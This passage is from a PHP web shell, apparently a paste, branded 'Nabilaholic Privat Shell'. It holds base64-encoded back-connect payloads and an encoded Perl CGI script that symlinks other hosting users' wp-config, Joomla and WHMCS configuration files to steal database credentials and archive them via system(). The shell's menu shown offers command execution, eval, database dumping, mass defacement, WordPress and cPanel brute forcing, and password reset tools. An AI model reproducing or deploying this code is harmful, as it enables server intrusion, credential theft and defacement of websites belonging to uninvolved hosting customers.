  515. vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB
  516. +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
  517. $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St
  518. ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j
  519. S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ
  520. ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw
  521. Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
  522. $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA
  523. BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95
  524. zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75
  525. i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A
  526. RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
  527. jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F
  528. 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
  529. //confshell
  530. $configshell = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCg0KPGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyIgLz4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KPHRpdGxlPlByaXY4IFNDUjwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IHRhaG9tYSwgdmVyZGFuYSwgQXJpYWw7DQogZm9udC1zaXplOiBtZWRpdW07DQogY29sb3I6ICNGRkZGRkY7DQogYmFja2dyb3VuZC1jb2xvcjogIzY2NjY2NjsNCiB0ZXh0LWFsaWduOiBjZW50ZXI7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KJzsNCnN1YiBsaWx7DQogICAgKCR1c2VyKSA9IEBfOw0KJG1zciA9IHF4e3B3ZH07DQoka29sYT0kbXNyLiIvIi4kdXNlcjsNCiRrb2xhPX5zL1xuLy9nOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob21lL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYSAtIGhvbWUudHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcy50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9nL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd29yZHByZXNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dlYi93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcyAtIHdlYi50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9TU0kucGhwJywka29sYS4nLSBDIE0gRiAudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vU1NJLnBocCcsJGtvbGEuJy0gQyBNIEYgLSBmb3J1bS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmMvY29uZmlnLnBocCcsJGtvbGEuJy0gTXlCQi50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luYy9jb25maWcucGhwJywka29sYS4nLSBNeUJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nLSBPdGhlci50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2xpYi9jb25maWcucGhwJywka29sYS4nLSBCYWxpdGJhbmcudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWNsaWVudHMudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmlsbGluZy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1iaWxsaW5nLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWJpbGxpbmdzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jcyAtIHdobWNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gd2htIC0gd2htLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLSBWQnVsbGV0aW4gLSBmb3J1bS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vY29uZmlnLnBocCcsJGtvbGEuJwktIFBocEJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jIC0gd2htYy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGtvbGEuJwktIHdobWNzMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1tYW5nZXdobWNzLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1teXNob3AudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnQudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnRzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnRzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbW1lcmNlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictb3Njb21tZXJjZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1vc2NvbW1lcmNlcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2hvcHBpbmcvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2FsZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd3AudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd3dvcmRwcmVzcyAtIHdwIC0gYmV0YS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmV0YS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBiZXRhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtcHJlc3MudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLXdvcmRwcmVzcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd29yZHByZXNzL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd29yZHByZXNzLWJldGEudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ld3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC1uZXdzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXcvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbmV3LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9ncy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBibG9ncy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9tZS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBob21lLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcm90YWwvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gcHJvdGFsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaXRlL3dwLWNvbmZpZy5waHAnLCRrb2xhLictIHdvcmRwcmVzcyAtIHNpdGUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21haW4vd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdGVzdC93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSB0ZXN0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhIC0gam9vbWxhIC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBwcm90YWwudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2pvby9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gam9vLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbXMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGNtcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2l0ZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gc2l0ZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbmV3cy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBuZXcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGhvbWUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3ZiL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHZiLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC92YjMvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy0gdmIzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY3BhbmVsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1wYW5lbC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1ob3N0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob3N0aW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RpbmcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictemVuY2FydC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3plbmNhcnQvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLSB6ZW5jYXJ0IC0gc2hvcC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLXNob3AtWkNzaG9wLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zbWYvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYgLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9TZXR0aW5ncy5waHAnLCRrb2xhLictIHNtZiAtIGZvcnVtLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW1zL1NldHRpbmdzLnBocCcsJGtvbGEuJy0gc21mIC0gZm9ydW1zLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdXBsb2FkL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHVwbG9hZCAudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2wvY29uZmlnLnBocCcsJGtvbGEuJy0gbWFsYXkudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy9rb25la3NpLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9zeXN0ZW0vc2lzdGVtLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOyANCiB9DQppZiAoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAnUE9TVCcpIHsNCiAgcmVhZChTVERJTiwgJGJ1ZmZlciwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7DQp9IGVsc2Ugew0KICAkYnVmZmVyID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAoQHBhaXJzKSB7DQogICgkbmFtZSwgJHZhbHVlKSA9IHNwbGl0KC89LywgJHBhaXIpOw0KICAkbmFtZSA9fiB0ci8rLyAvOw0KICAkbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkdmFsdWUgPX4gdHIvKy8gLzsNCiAgJHZhbHVlID1+IHMvJShbYS1mQS1GMC05XVthLWZBLUYwLTldKS9wYWNrKCJDIiwgaGV4KCQxKSkvZWc7DQogICRGT1JNeyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPiZuYnNwOzwvcD4NCjxmb3JtIG1ldGhvZD0icG9zdCI+DQo8dGV4dGFyZWEgbmFtZT0icGFzcyIgc3R5bGU9IndpZHRoOiA1NDNweDsgaGVpZ2h0OiA0MDBweCI+PC90ZXh0YXJlYT4NCjxiciAvPjxiciAvPg0KPGlucHV0IG5hbWU9InRhciIgdHlwZT0idGV4dCIgc3R5bGU9IndpZHRoOiAyMTJweCIgLz48YnIgLz48YnIgLz4NCjxpbnB1dCBuYW1lPSJTdWJtaXQxIiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJIYWphciAuLiEiIHN0eWxlPSJ3aWR0aDogOTlweCIgLz4NCjxiciAvPg0KPC9mb3JtPic7DQp9ZWxzZXsNCkBsaW5lcyA9PCRGT1JNe3Bhc3N9PjsNCiR5ID0gQGxpbmVzOw0Kb3BlbiAoTVlGSUxFLCAiPnRhci50bXAiKTsNCnByaW50IE1ZRklMRSAidGFyIC1jemYgIi4kRk9STXt0YXJ9LiIudGFyICI7DQpmb3IgKCRrYT0wOyRrYTwkeTska2ErKyl7DQp3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiZsaWwoJDEpOw0KcHJpbnQgTVlGSUxFICQxLiIudHh0ICI7DQpmb3IoJGtkPTE7JGtkPDE4OyRrZCsrKXsNCnByaW50IE1ZRklMRSAkMS4ka2QuIi50eHQgIjsNCn0NCn0NCiB9DQpwcmludCc8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPkRvbmUgISE8L3A+DQo8cD4mbmJzcDs8L3A+JzsNCmlmKCRGT1JNe3Rhcn0gbmUgIiIpew0Kb3BlbihJTkZPLCAidGFyLnRtcCIpOw0KQGxpbmVzID08SU5GTz4gOw0KY2xvc2UoSU5GTyk7DQpzeXN0ZW0oQGxpbmVzKTsNCnByaW50JzxwPjxhIGhyZWY9IicuJEZPUk17dGFyfS4nLnRhciI+IGRvd25sb2FkICBmaWxlPC9hPjwvcD4nOw0KfQ0KfQ0KIHByaW50Ig0KPC9ib2R5Pg0KPC9odG1sPiI7';
  531. ?>
  532. <html><head><title>Nabilaholic Privat Shell</title>
  533. <script type="text/javascript">
  534. function tukar(lama,baru){
  535.         document.getElementById(lama).style.display = 'none';
  536.         document.getElementById(baru).style.display = 'block';
  537. }
  538. </script>
  539. <style type="text/css">
  540. body{
  541.         background:#000000;;
  542. }
  543. a {
  544. text-decoration:none;
  545. }
  546. a:hover{
  547. border-bottom:1px solid #00ff00;
  548. }
  549. *{
  550.         font-size:11px;
  551.         font-family:Tahoma,Verdana,Arial;
  552.         color:white;
  553. }
  554. #menu{
  555.         background:#111111;
  556.         margin:8px 2px 4px 2px;
  557. }
  558. #menu a{
  559.         padding:4px 18px;
  560.         margin:0;
  561.         background:red;
  562.         text-decoration:none;
  563.         letter-spacing:1px;
  564.        
  565. }
  566. #menu a:hover{
  567.         background:blue;
  568.         border-bottom:1px solid #333333;
  569.         border-top:1px solid #333333;
  570. }
  571. .tabnet{
  572.         margin:15px auto 0 auto;
  573.         border: 1px solid #333333;
  574. }
  575. .main {
  576.         width:100%;
  577. }
  578. .gaya {
  579.         color: white;
  580. }
  581. .inputz{
  582.         background:#111111;
  583.         border:0;
  584.         padding:2px;
  585.         border-bottom:1px solid #222222;
  586.         border-top:1px solid #222222;
  587. }
  588. .inputzbut{
  589.         background:#111111;
  590.         color:#00ff00;
  591.         margin:0 4px;
  592.         border:1px solid #444444;
  593.  
  594. }
  595. .inputz:hover, .inputzbut:hover{
  596.         border-bottom:1px solid #00ff00;
  597.         border-top:1px solid #00ff00;
  598. }
  599. .output {
  600.         margin:auto;
  601.         border:1px solid #00ff00;
  602.         width:100%;
  603.         height:400px;
  604.         background:#000000;
  605.         padding:0 2px;
  606. }
  607. .cmdbox{
  608.         width:100%;
  609. }
  610. .head_info{
  611.         padding: 0 4px;
  612. }
  613. .jaya{ font-family: ;}
  614.  
  615. .b374k{
  616.         font-size:30px;
  617.         padding:0;
  618.         color:red;
  619. }
  620. .b374k_tbl{
  621.         text-align:center;
  622.         margin:0 4px 0 0;
  623.         padding:0 4px 0 0;
  624.         border-right:1px solid #333333;
  625. }
  626. .phpinfo table{
  627.         width:100%;
  628.         padding:0 0 0 0;
  629. }
  630. .phpinfo td{
  631.         background:#111111;
  632.         color:#cccccc;
  633. padding:6px 8px;;
  634. }
  635. .phpinfo th, th{
  636.         background:#191919;
  637.         border-bottom:1px solid #333333;
  638. font-weight:normal;
  639. }
  640. .phpinfo h2, .phpinfo h2 a{
  641.         text-align:center;
  642.         font-size:16px;
  643.         padding:0;
  644.         margin:30px 0 0 0;
  645.         background:#222222;
  646.         padding:4px 0;
  647. }
  648. .explore{
  649. width:100%;
  650. }
  651. .explore a {
  652. text-decoration:none;
  653. }
  654. .explore td{
  655. border-bottom:1px solid #333333;
  656. padding:0 8px;
  657. line-height:24px;
  658. }
  659. .explore th{
  660. padding:3px 8px;
  661. font-weight:normal;
  662. }
  663. .explore th:hover , .phpinfo th:hover{
  664. border-bottom:1px solid #00ff00;
  665. }
  666. .explore tr:hover{
  667. background:red;
  668. }
  669. .viewfile{
  670. background:#EDECEB;
  671. color:#000000;
  672. margin:4px 2px;
  673. padding:8px;
  674. }
  675. .sembunyi{
  676. display:none;
  677. padding:0;margin:0;
  678. }
  679.  
  680. </style></head>
  681. <body onLoad="document.getElementById('cmd').focus();">
  682. <div class="main">
  683. <!-- head info start here -->
  684. <div class="head_info">
  685. <table ><tr>
  686. <td><table class="b374k_tbl"><tr><td><a href="?"><span class="b374k">JKT48</span></a></td></tr><tr><td><b>HACKER INSIDE</b></td></tr></table></td>
  687. <td><?php echo $buff; ?></td>
  688. </tr></table>
  689. </div>
  690. <!-- head info end here -->
  691. <!-- menu start -->
  692. <center><div id="menu">
  693. <a href="?<?php echo "y=".$pwd; ?>">Explore</a>
  694. <a href="?<?php echo "y=".$pwd; ?>&amp;x=shell">Shell</a>
  695. <a href="?<?php echo "y=".$pwd; ?>&amp;x=php">Eval</a>
  696. <a href="?<?php echo "y=".$pwd; ?>&amp;x=sql">Mysql</a>
  697. <a href="?<?php echo "y=".$pwd; ?>&amp;x=dump">DB Dump</a>
  698. <a href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo">Php Info</a>
  699. <a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">Netsploit</a>
  700. <a href="?<?php echo "y=".$pwd; ?>&amp;x=upload">Upload</a>
  701. <a href="?<?php echo "y=".$pwd; ?>&amp;x=mail">E-Mail</a>
  702. <a href="?<?php echo "y=".$pwd; ?>&amp;x=sqli-scanner">SQLI Scan</a>
  703. <a href="?<?php echo "y=".$pwd; ?>&amp;x=port-sc">Port Scan</a>
  704. <a href="?<?php echo "y=".$pwd; ?>&amp;x=tool">Tools</a>
  705. <a href="?<?php echo "y=".$pwd; ?>&amp;x=symlink">Symlink</a><br><br>
  706. <a href="?<?php echo "y=".$pwd; ?>&amp;x=config">Config</a>
  707. <a href="?<?php echo "y=".$pwd; ?>&amp;x=bypass">Bypass</a>
  708. <a href="?<?php echo "y=".$pwd; ?>&amp;x=cgi">CgiShell</a>
  709. <a href="?<?php echo "y=".$pwd; ?>&amp;x=domain">Domain</a>
  710. <a href="?<?php echo "y=".$pwd; ?>&amp;x=jodexer">Joomla IndChange</a>
  711. <a href="?<?php echo "y=".$pwd; ?>&amp;x=wp-reset">WP ResPass</a>
  712. <a href="?<?php echo "y=".$pwd; ?>&amp;x=jm-reset">Joomla ResPass</a>
  713. <a href="?<?php echo "y=".$pwd; ?>&amp;x=whmcs">WHMCS Decoder</a>
  714. <a href="?<?php echo "y=".$pwd; ?>&amp;x=zone">Zone-H</a><br><br>
  715. <a href="?<?php echo "y=".$pwd; ?>&amp;x=mass">Mass Deface</a>
  716. <a href="?<?php echo "y=".$pwd; ?>&amp;x=wpbrute">WP BruteForce</a>
  717. <a href="?<?php echo "y=".$pwd; ?>&amp;x=brute">Cpanel BruteForce</a>
  718. <a href="?<?php echo "y=".$pwd; ?>&amp;x=adfin">Admin Finder</a>
  719. <a href="?<?php echo "y=".$pwd; ?>&amp;x=hash">Password Hash</a>
  720. <a href="?<?php echo "y=".$pwd; ?>&amp;x=hashid">Hash ID</a>
  721. <a href="?<?php echo "y=".$pwd; ?>&amp;x=string">Script Encode</a><br><br>
  722. <a href="?<?php echo "y=".$pwd; ?>&amp;x=whois">Website Whois</a>
  723. <a href="?<?php echo "y=".$pwd; ?>&amp;x=jss">Joomla Server Scanner</a>
  724. <a href="?<?php echo "y=".$pwd; ?>&amp;x=cms_detect">Cms Detector</a>
